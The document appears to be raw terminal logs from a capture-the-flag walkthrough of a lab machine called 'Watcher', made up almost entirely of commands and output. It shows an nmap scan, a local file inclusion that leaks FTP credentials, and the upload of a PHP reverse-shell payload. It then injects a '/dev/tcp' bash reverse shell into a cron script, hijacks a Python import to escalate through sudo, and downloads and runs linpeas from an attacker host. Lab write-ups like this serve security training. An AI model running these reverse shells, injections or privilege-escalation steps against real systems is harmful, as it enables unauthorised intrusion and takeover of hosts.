NSE at 14:01, 1.75s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 14:01 Completed NSE at 14:01, 0.00s elapsed Nmap scan report for 10.10.202.105 Host is up, received user-set (0.24s latency). Scanned at 2023-03-15 14:01:37 EDT for 21s PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack vsftpd 3.0.3 22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 e180ec1f269e32eb273f26acd237ba96 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC7hN8ixZsMzRUvaZjiBUrqtngTVOcdko2FRpRMT0D/LTRm8x8SvtI5a52C/adoiNNreQO5/DOW8k5uxY1Rtx/HGvci9fdbplPz7RLtt+Mc9pgGHj0ZEm/X0AfhBF0P3Uwf3paiqCqeDcG1HHVceFUKpDt0YcBeiG1JJ5LZpRxqAyd0jOJsC1FBNBPZAtUA11KOEvxbg5j6pEL1rmbjwGKUVxM8HIgSuU6R6anZxTrpUPvcho9W5F3+JSxl/E+vF9f51HtIQcXaldiTNhfwLsklPcunDw7Yo9IqhqlORDrM7biQOtUnanwGZLFX7kfQL28r9HbEwpAHxdScXDFmu5wR | 256 36ff7011058ed4507a29915875ac2e76 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBmjWU4CISIz0mdwq6ObddQ3+hBuOm49wam2XHUdUaJkZHf4tOqzl+HVz107toZIXKn1ui58hl9+6ojTnJ6jN/Y= | 256 48d23e45da0cf0f6654ef9789737aa8a (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHb7zsrJYdPY9eb0sx8CvMphZyxajGuvbDShGXOV9MDX 80/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Corkplacemats |_http-generator: Jekyll v4.1.1 Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel NSE: Script Post-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 14:01 Completed NSE at 14:01, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 14:01 Completed NSE at 14:01, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 14:01 Completed NSE at 14:01, 0.00s elapsed Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 22.63 seconds http://10.10.202.105/robots.txt User-agent: * Allow: /flag_1.txt Allow: /secret_file_do_not_read.txt view-source:http://10.10.202.105/flag_1.txt FLAG{robots_dot_text_what_is_next} view-source:http://10.10.202.105/secret_file_do_not_read.txt <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access this resource.</p> <hr> <address>Apache/2.4.29 (Ubuntu) Server at 10.10.202.105 Port 80</address> </body></html> http://10.10.202.105/post.php?post=secret_file_do_not_read.txt Hi Mat, The credentials for the FTP server are below. I've set the files to be saved to /home/ftpuser/ftp/files. Will ---------- ftpuser:givemefiles777 ┌──(witty㉿kali)-[~/Downloads] └─$ ftp 10.10.202.105 Connected to 10.10.202.105. 220 (vsFTPd 3.0.3) Name (10.10.202.105:witty): ftpuser 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -l 229 Entering Extended Passive Mode (|||42209|) 150 Here comes the directory listing. drwxr-xr-x 2 1001 1001 4096 Dec 03 2020 files -rw-r--r-- 1 0 0 21 Dec 03 2020 flag_2.txt 226 Directory send OK. ftp> more flag_2.txt FLAG{ftp_you_and_me} ftp> cd files 250 Directory successfully changed. ftp> ls -lah 229 Entering Extended Passive Mode (|||45852|) 150 Here comes the directory listing. drwxr-xr-x 2 1001 1001 4096 Dec 03 2020 . dr-xr-xr-x 3 65534 65534 4096 Dec 03 2020 .. 226 Directory send OK. ftp> put payload_ivan.php local: payload_ivan.php remote: payload_ivan.php 229 Entering Extended Passive Mode (|||47626|) 150 Ok to send data. 100% |**************************************| 9284 792.65 KiB/s 00:00 ETA 226 Transfer complete. 9284 bytes sent in 00:00 (22.85 KiB/s) http://10.10.202.105/post.php?post=/home/ftpuser/ftp/flag_2.txt FLAG{ftp_you_and_me} http://10.10.202.105/post.php?post=/home/ftpuser/ftp/files/payload_ivan.php ┌──(witty㉿kali)-[~/Downloads] └─$ rlwrap nc -lvnp 1337 listening on [any] 1337 ... connect to [10.8.19.103] from (UNKNOWN) [10.10.202.105] 56022 SOCKET: Shell has connected! PID: 2136 python3 -c 'import pty;pty.spawn("/bin/bash")' www-data@watcher:/var/www/html$ www-data@watcher:/var/www/html$ export TERM=xterm export TERM=xterm www-data@watcher:/var/www/html$ zsh: suspended rlwrap nc -lvnp 1337 ┌──(witty㉿kali)-[~/Downloads] └─$ stty raw -echo; fg [1] + continued rlwrap nc -lvnp 1337 www-data@watcher:/var/www/html$ www-data@watcher:/var/www/html$ ls ls bunch.php images post.php secret_file_do_not_read.txt css index.php robots.txt striped.php flag_1.txt more_secrets_a9f10a round.php www-data@watcher:/var/www/html$ cd more_secrets_a9f10a cd more_secrets_a9f10a www-data@watcher:/var/www/html/more_secrets_a9f10a$ ls ls flag_3.txt www-data@watcher:/var/www/html/more_secrets_a9f10a$ cat flag_3.txt cat flag_3.txt FLAG{lfi_what_a_guy} www-data@watcher:/var/www/html/more_secrets_a9f10a$ find / -type f -name "flag*" 2>/dev/null | xargs ls -lah </ -type f -name "flag*" 2>/dev/null | xargs ls -lah -rw-r--r-- 1 root root 21 Dec 3 2020 /home/ftpuser/ftp/flag_2.txt -rw------- 1 mat mat 37 Dec 3 2020 /home/mat/flag_5.txt -rw------- 1 toby toby 21 Dec 3 2020 /home/toby/flag_4.txt -rw------- 1 will will 41 Dec 3 2020 /home/will/flag_6.txt -r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS1/flags -r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS10/flags -r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS11/flags -r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS12/flags -r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS13/flags -r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS14/flags -r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS15/flags -r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS16/flags -r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS17/flags -r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS18/flags -r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS19/flags -r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS2/flags -r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS20/flags -r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS21/flags -r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS22/flags -r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS23/flags -r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS24/flags -r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS25/flags -r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS26/flags -r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS27/flags -r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS28/flags -r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS29/flags -r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS3/flags -r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS30/flags -r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS31/flags -r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS4/flags -r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS5/flags -r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS6/flags -r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS7/flags -r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS8/flags -r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS9/flags -r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/pnp0/00:06/tty/ttyS0/flags -rw-r--r-- 1 root root 4.0K Mar 15 18:42 /sys/devices/vif-0/net/eth0/flags -rw-r--r-- 1 root root 4.0K Mar 15 18:42 /sys/devices/virtual/net/lo/flags -rw-r--r-- 1 root root 4.0K Mar 15 18:42 /sys/devices/virtual/net/lxdbr0/flags -rw-r--r-- 1 root root 4.0K Mar 15 18:42 /sys/devices/virtual/net/vethH5SDE5/flags -rw-r--r-- 1 root root 0 Nov 23 2020 /usr/src/linux-headers-4.15.0-126-generic/include/config/arch/uses/high/vma/flags.h -rw-r--r-- 1 root root 1.6K Jan 28 2018 /usr/src/linux-headers-4.15.0-126/scripts/coccinelle/locks/flags.cocci -rw-r--r-- 1 root root 0 Dec 9 2020 /usr/src/linux-headers-4.15.0-128-generic/include/config/arch/uses/high/vma/flags.h -rw-r--r-- 1 root root 1.6K Jan 28 2018 /usr/src/linux-headers-4.15.0-128/scripts/coccinelle/locks/flags.cocci -rw-r--r-- 1 root root 35 Dec 3 2020 /var/www/html/flag_1.txt -rw-r--r-- 1 root root 21 Dec 3 2020 /var/www/html/more_secrets_a9f10a/flag_3.txt www-data@watcher:/home/toby$ sudo -u toby cat flag_4.txt sudo -u toby cat flag_4.txt FLAG{chad_lifestyle} www-data@watcher:/home/toby$ cat note.txt cat note.txt Hi Toby, I've got the cron jobs set up now so don't worry about getting that done. Mat www-data@watcher:/home/toby$ cd jobs cd jobs www-data@watcher:/home/toby/jobs$ ls ls cow.sh www-data@watcher:/home/toby/jobs$ cat cow.sh cat cow.sh #!/bin/bash cp /home/mat/cow.jpg /tmp/cow.jpg www-data@watcher:/home/toby/jobs$ cat /etc/crontab cat /etc/crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) # */1 * * * * mat /home/toby/jobs/cow.sh www-data@watcher:/home/toby/jobs$ sudo -u toby /bin/bash sudo -u toby /bin/bash toby@watcher:~/jobs$ echo "/bin/bash -i >& /dev/tcp/10.8.19.103/1338 0>&1" >> cow.sh <ash -i >& /dev/tcp/10.8.19.103/1338 0>&1" >> cow.sh toby@watcher:~/jobs$ cat cow.sh cat cow.sh #!/bin/bash cp /home/mat/cow.jpg /tmp/cow.jpg /bin/bash -i >& /dev/tcp/10.8.19.103/1338 0>&1 ┌──(witty㉿kali)-[~/Downloads] └─$ rlwrap nc -lvnp 1338 listening on [any] 1338 ... connect to [10.8.19.103] from (UNKNOWN) [10.10.46.15] 34684 bash: cannot set terminal process group (2175): Inappropriate ioctl for device bash: no job control in this shell mat@watcher:~$ cd /home/mat cd /home/mat mat@watcher:~$ ls ls cow.jpg flag_5.txt note.txt scripts mat@watcher:~$ cat flag_5.txt cat flag_5.txt FLAG{live_by_the_cow_die_by_the_cow} mat@watcher:~$ cat note.txt cat note.txt Hi Mat, I've set up your sudo rights to use the python script as my user. You can only run the script with sudo so it should be safe. Will mat@watcher:~$ sudo -l sudo -l Matching Defaults entries for mat on watcher: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User mat may run the following commands on watcher: (will) NOPASSWD: /usr/bin/python3 /home/mat/scripts/will_script.py * mat@watcher:~$ cd scripts cd scripts mat@watcher:~/scripts$ ls -lah ls -lah total 16K drwxrwxr-x 2 will will 4.0K Dec 3 2020 . drwxr-xr-x 6 mat mat 4.0K Dec 3 2020 .. -rw-r--r-- 1 mat mat 133 Dec 3 2020 cmd.py -rw-r--r-- 1 will will 208 Dec 3 2020 will_script.py mat@watcher:~/scripts$ cat will_script.py cat will_script.py import os import sys from cmd import get_command cmd = get_command(sys.argv[1]) whitelist = ["ls -lah", "id", "cat /etc/passwd"] if cmd not in whitelist: print("Invalid command!") exit() os.system(cmd) mat@watcher:~/scripts$ cat cmd.py cat cmd.py def get_command(num): if(num == "1"): return "ls -lah" if(num == "2"): return "id" if(num == "3"): return "cat /etc/passwd" mat@watcher:~/scripts$ sudo -u will /usr/bin/python3 /home/mat/scripts/will_script.py 1 </usr/bin/python3 /home/mat/scripts/will_script.py 1 total 20K drwxrwxr-x 3 will will 4.0K Mar 15 21:59 . drwxr-xr-x 6 mat mat 4.0K Dec 3 2020 .. -rw-r--r-- 1 mat mat 133 Dec 3 2020 cmd.py drwxr-xr-x 2 will will 4.0K Mar 15 21:59 __pycache__ -rw-r--r-- 1 will will 208 Dec 3 2020 will_script.py mat@watcher:~/scripts$ sudo -u will /usr/bin/python3 /home/mat/scripts/will_script.py 2 </usr/bin/python3 /home/mat/scripts/will_script.py 2 uid=1000(will) gid=1000(will) groups=1000(will),4(adm) mat@watcher:~/scripts$ sudo -u will /usr/bin/python3 /home/mat/scripts/will_script.py 3 </usr/bin/python3 /home/mat/scripts/will_script.py 3 root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin syslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin lxd:x:105:65534::/var/lib/lxd/:/bin/false uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin pollinate:x:109:1::/var/cache/pollinate:/bin/false sshd:x:110:65534::/run/sshd:/usr/sbin/nologin will:x:1000:1000:will:/home/will:/bin/bash ftp:x:111:114:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin ftpuser:x:1001:1001:,,,:/home/ftpuser:/usr/sbin/nologin mat:x:1002:1002:,#,,:/home/mat:/bin/bash toby:x:1003:1003:,,,:/home/toby:/bin/bash ┌──(witty㉿kali)-[/tmp] └─$ cat cmd.py import os def get_command(num): if(num == "1"): os.system("/bin/bash") return "ls -lah" if(num == "2"): return "id" if(num == "3"): return "cat /etc/passwd" mat@watcher:~/scripts$ cat << EOF > cmd.py import os def get_command(num): if num == "1": os.system("/bin/bash") return "ls -lah" elif num == "2": return "id" elif num == "3": cat << EOF > cmd.py return "cat /etc/passwd" EOF mat@watcher:~/scripts$ cat cmd.py cat cmd.py import os def get_command(num): if num == "1": os.system("/bin/bash") return "ls -lah" elif num == "2": return "id" elif num == "3": return "cat /etc/passwd" mat@watcher:~/scripts$ sudo -u will /usr/bin/python3 /home/mat/scripts/will_script.py 1 id uid=1000(will) gid=1000(will) groups=1000(will),4(adm) python3 -c 'import pty;pty.spawn("/bin/bash")' will@watcher:~/scripts$ cd /home/will cd /home/will will@watcher:/home/will$ ls ls flag_6.txt will@watcher:/home/will$ cat flag_6.txt cat flag_6.txt FLAG{but_i_thought_my_script_was_secure} let's upload linpeas.sh ┌──(witty㉿kali)-[~/Downloads] └─$ python3 -m http.server 1234 Serving HTTP on 0.0.0.0 port 1234 (http://0.0.0.0:1234/) ... 10.10.46.15 - - [15/Mar/2023 18:12:20] "GET /linpeas.sh HTTP/1.1" 200 - will@watcher:/home/will$ cd /tmp cd /tmp will@watcher:/tmp$ ls ls cow.jpg systemd-private-4299b256f4914c5dabb6efdd98cbfad1-apache2.service-RcvrZa systemd-private-4299b256f4914c5dabb6efdd98cbfad1-systemd-resolved.service-QXKnlS systemd-private-4299b256f4914c5dabb6efdd98cbfad1-systemd-timesyncd.service-SXkG61 will@watcher:/tmp$ wget http://10.8.19.103:1234/linpeas.sh wget http://10.8.19.103:1234/linpeas.sh --2023-03-15 22:12:20-- http://10.8.19.103:1234/linpeas.sh Connecting to 10.8.19.103:1234... connected. HTTP request sent, awaiting response... 200 OK Length: 828098 (809K) [text/x-sh] Saving to: ‘linpeas.sh’ linpeas.sh 100%[===================>] 808.69K 402KB/s in 2.0s 2023-03-15 22:12:23 (402 KB/s) - ‘linpeas.sh’ saved [828098/828098] will@watcher:/tmp$ chmod +x linpeas.sh chmod +x linpeas.sh will@watcher:/tmp$ ./linpeas.sh ./linpeas.sh ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄ ▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄ ▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄ ▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄ ▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▀▀▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀ ▀▀▀▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▀▀ ▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀ /---------------------------------------------------------------------------------\ | Do you like PEASS? | |---------------------------------------------------------------------------------| | Get the latest version : https://github.com/sponsors/carlospolop | | Follow on Twitter : @carlospolopm | | Respect on HTB : SirBroccoli | |---------------------------------------------------------------------------------| | Thank you! | \---------------------------------------------------------------------------------/ linpeas-ng by carlospolop ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission. Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist LEGEND: RED/YELLOW: 95% a PE vector RED: You should take a look to it LightCyan: Users with console Blue: Users without console & mounted devs Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) LightMagenta: Your username Starting linpeas. Caching Writable Folders... ╔═══════════════════╗ ═══════════════════════════════╣ Basic information ╠═══════════════════════════════ ╚═══════════════════╝ OS: Linux version 4.15.0-128-generic (buildd@lcy01-amd64-025) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #131-Ubuntu SMP Wed Dec 9 06:57:35 UTC 2020 User & Groups: uid=1000(will) gid=1000(will) groups=1000(will),4(adm) Hostname: watcher Writable folder: /dev/shm [+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h) [+] /bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h) [+] /bin/nc is available for network discovery & port scanning (linpeas can discover hosts and scan ports, learn more with -h) Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . uniq: write error: Broken pipe DONE ╔════════════════════╗ ══════════════════════════════╣ System Information ╠══════════════════════════════ ╚════════════════════╝ ╔══════════╣ Operative system ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits Linux version 4.15.0-128-generic (buildd@lcy01-amd64-025) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #131-Ubuntu SMP Wed Dec 9 06:57:35 UTC 2020 Distributor ID: Ubuntu Description: Ubuntu 18.04.5 LTS Release: 18.04 Codename: bionic ╔══════════╣ Sudo version ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version Sudo version 1.8.21p2 ╔══════════╣ CVEs Check Vulnerable to CVE-2021-4034 Potentially Vulnerable to CVE-2022-2588 ╔══════════╣ PATH ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin New path exported: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin ╔══════════╣ Date & uptime Wed 15 Mar 22:18:44 UTC 2023 22:18:44 up 59 min, 0 users, load average: 3.02, 2.23, 1.51 ╔══════════╣ Any sd*/disk* disk in /dev? (limit 20) disk ╔══════════╣ Unmounted file-system? ╚ Check if you can mount umounted devices /dev/disk/by-id/dm-uuid-LVM-JDiX8mONRtORjihtAeB1NKbW4At1spD6uvcJcoIeLZvX833HMx9Ow9sxIsGsUsQe/ ext4 defaults 0 0 /dev/disk/by-uuid/e2eadcec-b293-4dba-b0a6-ec2a71093ce7 /boot ext4 defaults 0 0 ╔══════════╣ Environment ╚ Any private information inside environment variables? SUDO_GID=1002 LESSOPEN=| /usr/bin/lesspipe %s HISTFILESIZE=0 MAIL=/var/mail/will USER=will SHLVL=4 HOME=/home/mat OLDPWD=/home/will SUDO_UID=1002 LOGNAME=will _=./linpeas.sh USERNAME=will TERM=unknown PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin LANG=en_GB.UTF-8 HISTSIZE=0 LS_COLORS= SUDO_COMMAND=/usr/bin/python3 /home/mat/scripts/will_script.py 1 SHELL=/bin/bash LESSCLOSE=/usr/bin/lesspipe %s %s SUDO_USER=mat PWD=/tmp HISTFILE=/dev/null ╔══════════╣ Searching Signature verification failed in dmesg ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed dmesg Not Found ╔══════════╣ Executing Linux Exploit Suggester ╚ https://github.com/mzet-/linux-exploit-suggester cat: write error: Broken pipe cat: write error: Broken pipe cat: write error: Broken pipe cat: write error: Broken pipe cat: write error: Broken pipe [+] [CVE-2021-4034] PwnKit Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt Exposure: probable Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main [+] [CVE-2021-3156] sudo Baron Samedit Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt Exposure: probable Tags: mint=19,[ ubuntu=18|20 ], debian=10 Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main [+] [CVE-2021-3156] sudo Baron Samedit 2 Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt Exposure: probable Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10 Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main [+] [CVE-2018-18955] subuid_shell Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1712 Exposure: probable Tags: [ ubuntu=18.04 ]{kernel:4.15.0-20-generic},fedora=28{kernel:4.16.3-301.fc28} Download URL: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45886.zip Comments: CONFIG_USER_NS needs to be enabled [+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET) Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/ https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/ Exposure: less probable Tags: ubuntu=(22.04){kernel:5.15.0-27-generic} Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN) [+] [CVE-2022-2586] nft_object UAF Details: https://www.openwall.com/lists/oss-security/2022/08/29/5 Exposure: less probable Tags: ubuntu=(20.04){kernel:5.12.13} Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1 Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN) [+] [CVE-2021-22555] Netfilter heap out-of-bounds write Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html Exposure: less probable Tags: ubuntu=20.04{kernel:5.8.0-*} Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c Comments: ip_tables kernel module must be loaded [+] [CVE-2019-18634] sudo pwfeedback Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/ Exposure: less probable Tags: mint=19 Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c Comments: sudo configuration requires pwfeedback to be enabled. [+] [CVE-2019-15666] XFRM_UAF Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc Exposure: less probable Download URL: Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled [+] [CVE-2017-5618] setuid screen v4.5.0 LPE Details: https://seclists.org/oss-sec/2017/q1/184 Exposure: less probable Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154 [+] [CVE-2017-0358] ntfs-3g-modprobe Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1072 Exposure: less probable Tags: 